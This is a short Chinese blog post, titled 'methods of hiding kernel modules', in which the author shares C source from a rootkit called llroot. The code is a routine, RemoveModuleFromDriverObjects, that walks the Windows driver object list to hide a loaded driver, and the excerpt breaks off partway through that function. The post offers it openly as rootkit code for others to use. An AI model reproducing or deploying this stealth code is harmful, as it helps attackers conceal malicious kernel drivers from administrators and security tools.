在rootkit.com上一个russian hacker发的文章中提到这两种方法,和他交流了下,在llroot中实现了,代码贴出来灌水:/****************************************************************************** ** ** The following routines implement hide driver by removing module from ** driver objects and device objects ** *******************************************************************************/ void RemoveModuleFromDriverObjects(void) { POBJECT_TYPE DriverType=*IoDriverObjectType; PLIST_ENTRY e_prev,e_next,entry0,entry1; PDRIVER_OBJECT obj; PUNICODE_STRING punistrDriverName; PANSI_STRING pstrDriverName; NTSTATUS ntStatus; ULONG d_size; entry0=DriverType->ObjectListHead.Flink; entry1=entry0; punistrDriverName=(PUNICODE_STRING) ExAllocatePool(PagedPool, sizeof(UNICODE_STRING)+(sizeof(WCHAR)*1024)); if (punistrDriverName == NULL) { DbgPrint("llroot-->punistrDriverName
隐藏内核模块的方法
最新推荐文章于 2023-10-08 23:02:54 发布